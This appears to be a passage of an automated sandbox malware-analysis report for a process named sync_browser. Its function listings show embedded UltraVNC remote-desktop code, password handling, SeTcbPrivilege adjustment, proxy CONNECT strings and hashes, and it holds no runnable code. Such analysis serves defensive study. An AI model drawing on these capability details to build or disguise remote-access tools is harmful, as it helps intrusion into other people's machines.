                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
                                                    • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                    • API String ID: 181403729-1081969236
                                                    • Opcode ID: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
                                                    • Instruction ID: aafd96d67158f8196d35cf0a0117f26d846df049e31135ddb4238683825519e7
                                                    • Opcode Fuzzy Hash: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
                                                    • Instruction Fuzzy Hash: F6615BA2B185E282F718AB64D4156BDB790EF85B48FC4803BED9E4B691DF3CD509C320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: rand$Time_getptd$FileSystem
                                                    • String ID: After DH: g=%I64u, m=%I64u, i=%I64u, key=%I64u$CheckUserGroupPasswordUni result=%i$interKey larger than maxNum
                                                    • API String ID: 3485648590-3000200491
                                                    • Opcode ID: a3ff226198b317dc9944d335c8f75175da97f0ba89ea36ea833236189cd01347
                                                    • Instruction ID: a84578c402e6bdd66fe5cafbdd97da4fbbcb8410ed6d87c47d79451e8339b33f
                                                    • Opcode Fuzzy Hash: a3ff226198b317dc9944d335c8f75175da97f0ba89ea36ea833236189cd01347
                                                    • Instruction Fuzzy Hash: 47F1D352B1A3D54BEB00D7BA54101BDABA09B82B89FD44077DE9D2BB9BDE3CD101C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ImageLoadModule$BitsCreateDeleteFileHandleName
                                                    • String ID: ($DISPLAY$\background.bmp
                                                    • API String ID: 3125945695-1422902838
                                                    • Opcode ID: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
                                                    • Instruction ID: aba95d65a7ec67e829d93287338d49272a09d2a99dcd8291b2a1811903b03482
                                                    • Opcode Fuzzy Hash: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
                                                    • Instruction Fuzzy Hash: A2413031A1879187E764AB24B45576EBBA0FF89B94FC01236DE9D47B94DF3CD0058B10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: recv$send
                                                    • String ID: CONNECT %s:%d HTTP/1.0$Location: $Proxy-Authenticate:$WWW-Authenticate:$basic
                                                    • API String ID: 1963230611-4083095726
                                                    • Opcode ID: d657ed37a6cae802db04decd52c8b9e56745bb5c9d23933e6423cb635756a354
                                                    • Instruction ID: 46c10eaf9685de967f5d58ac31e9895380f835a4136876e9f41415691460ff10
                                                    • Opcode Fuzzy Hash: d657ed37a6cae802db04decd52c8b9e56745bb5c9d23933e6423cb635756a354
                                                    • Instruction Fuzzy Hash: EAF1A022A0CA9682FB50A725A54067DAA95EF85F98FC41133DE5D43A95DF3CE543C320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Library$AddressCreateDisplayEnumFreeLoadProcSettings
                                                    • String ID: DISPLAY$EnumDisplayDevicesA$USER32$mv video hook driver2
                                                    • API String ID: 3702840025-1174184736
                                                    • Opcode ID: d748da3611d51f35711ae867021bc229038fb3513b14e4069d6ed17d8080ad48
                                                    • Instruction ID: 4a7f8067c40fc77e767461f48b8cc8b70c6c8f398503b813c6d41d9fb8c8ece9
                                                    • Opcode Fuzzy Hash: d748da3611d51f35711ae867021bc229038fb3513b14e4069d6ed17d8080ad48
                                                    • Instruction Fuzzy Hash: 3E31612171968286F774AB25B854BAEA694FFC9B58FC40136DE8E47A44DF3CD105C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: PrivateProfile$CloseFileModuleNameOpenQueryValue
                                                    • String ID: NewMSLogon$Software\ORL\WinVNC3$UseRegistry$admin
                                                    • API String ID: 771632046-3493897170
                                                    • Opcode ID: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
                                                    • Instruction ID: 5cf6b8f09221eedb5b7e5bf34b40689511d090d78c155e9dadb967e31205f15e
                                                    • Opcode Fuzzy Hash: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
                                                    • Instruction Fuzzy Hash: 81314371A1DA9287EA60EB20F455BAEB7A4FF89B48FC01036EA4D47A54DF3DD105CB10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$CloseHandleOpenToken$AdjustCurrentErrorLastLookupPrivilegePrivilegesValue
                                                    • String ID: SeTcbPrivilege
                                                    • API String ID: 2450735924-1502394177
                                                    • Opcode ID: 049707e4f3f4a22454709a7697195c91078346b3f6d7fa6eb6f95c633ec379e6
                                                    • Instruction ID: 895fcba29ff2f0efaef2d4c10b056bf084273f79cea848b4090e4e828b53ade4
                                                    • Opcode Fuzzy Hash: 049707e4f3f4a22454709a7697195c91078346b3f6d7fa6eb6f95c633ec379e6
                                                    • Instruction Fuzzy Hash: CC213B61A29B4687EB54AB65A40456EA7A0FFC8F44FC44036EE4E47758DF3CD4448B10
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$_get_daylight_invalid_parameter_noinfo$ByteCharMultiWidefree$ErrorFreeHeapInformationLastTimeZone___lc_codepage_func__wtomb_environ_amsg_exit_getptd_lock
                                                    • String ID:
                                                    • API String ID: 2532449802-0
                                                    • Opcode ID: 8dacce8ed05afb912c218c2bfa4b7955afc0b41eb5700f84e9d69f6c384d718a
                                                    • Instruction ID: 47ebc54409a12f00679bcd5c8aa6269d7222e28694484fd60c755f4133f573c9
                                                    • Opcode Fuzzy Hash: 8dacce8ed05afb912c218c2bfa4b7955afc0b41eb5700f84e9d69f6c384d718a
                                                    • Instruction Fuzzy Hash: 78C18E32A0D28287E724AF65A54077EBA95BF84F88FC05136DE8D53796DF3CE8118720
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _get_daylight$_errno_isindst$__getgmtimebuf__tzset_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 1457502553-0
                                                    • Opcode ID: cbc433eb692454e3aa796801b86b425fca8be06b4507e2d40963ba8697586f4d
                                                    • Instruction ID: 9674513ed167c2b1f7da7654c1ca9861fd3052b95ca6e926f442fd18f56ff650
                                                    • Opcode Fuzzy Hash: cbc433eb692454e3aa796801b86b425fca8be06b4507e2d40963ba8697586f4d
                                                    • Instruction Fuzzy Hash: 6091F872B0474647EB58AF25C8113BCA299EB54B8DFC48037EE0E4AB89EF3CE5408710
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressInfoProcSystem$Version
                                                    • String ID: @$GetNativeSystemInfo$GetVersionExA
                                                    • API String ID: 4103462327-1183986914
                                                    • Opcode ID: c077f823e49ebc5b331189c8cff37ce902c5a9973228b6b7ea9e339cd8702d33
                                                    • Instruction ID: 93713e3b3732edc01ccbc1a2e38ced1a8fc51c5535632bfea651a41186c1fa0d
                                                    • Opcode Fuzzy Hash: c077f823e49ebc5b331189c8cff37ce902c5a9973228b6b7ea9e339cd8702d33
                                                    • Instruction Fuzzy Hash: 3FF14B76A08281CAFB54AF35D0403ADBBA1FB45B4CF988036DE5D4A299DB38E545CB21
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DesktopOpen$ClipboardCloseInput
                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                    • API String ID: 2872304593-3977938048
                                                    • Opcode ID: c96e353cc41264b9558b101086f72bb72654cc8578bf969b8a62cc31f3abbd79
                                                    • Instruction ID: 40c7b5da8780a3fe044ccb6b008662e18a2568e30f85595f79346524765c7914
                                                    • Opcode Fuzzy Hash: c96e353cc41264b9558b101086f72bb72654cc8578bf969b8a62cc31f3abbd79
                                                    • Instruction Fuzzy Hash: 1A12D332A086D186EBA4AB25C8587FDA7A1EB85F88FC44132DE4D4B796CF3CD551C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: PrivateProfileQueryValue$FileModuleNameString
                                                    • String ID: UseRegistry$admin$admin_auth
                                                    • API String ID: 3374479654-3376419731
                                                    • Opcode ID: 252edaa955b2cbd624277fcddc4e8b16f6cd9647470f44b878fedc813ede5e3d
                                                    • Instruction ID: e131ccde5ee5e7aeed3a92d746fe3e173e31f74ab53fdccddbe834866f066526
                                                    • Opcode Fuzzy Hash: 252edaa955b2cbd624277fcddc4e8b16f6cd9647470f44b878fedc813ede5e3d
                                                    • Instruction Fuzzy Hash: 2A31323261DA9282EA54AB11E8447AEF7A4FF88B88FC41036ED8D47B54DF3DD505CB10
                                                    APIs
                                                    Strings
                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF7D595166F
                                                    • i, xrefs: 00007FF7D5951809
                                                    • unable to determine legacy authentication method, xrefs: 00007FF7D595173F
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection_errnofreemalloc$AllocCurrentEnterHeapLeaveProcess_callnewhrand
                                                    • String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$unable to determine legacy authentication method
                                                    • API String ID: 2847437661-1576074771
                                                    • Opcode ID: c943cd2ba047107cef663f8e316ffb6f847f0ddfb623d2f2043e74a738892daf
                                                    • Instruction ID: b69e9ebceec8d3b02a656a177e734c1f5fdf2a50abb9590aa81888c569e583f6
                                                    • Opcode Fuzzy Hash: c943cd2ba047107cef663f8e316ffb6f847f0ddfb623d2f2043e74a738892daf
                                                    • Instruction Fuzzy Hash: 22D1A022B0864287FB14EB65D4543BCA7A2EB84B68FD44236DE6E47AD5CF3CD851D320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
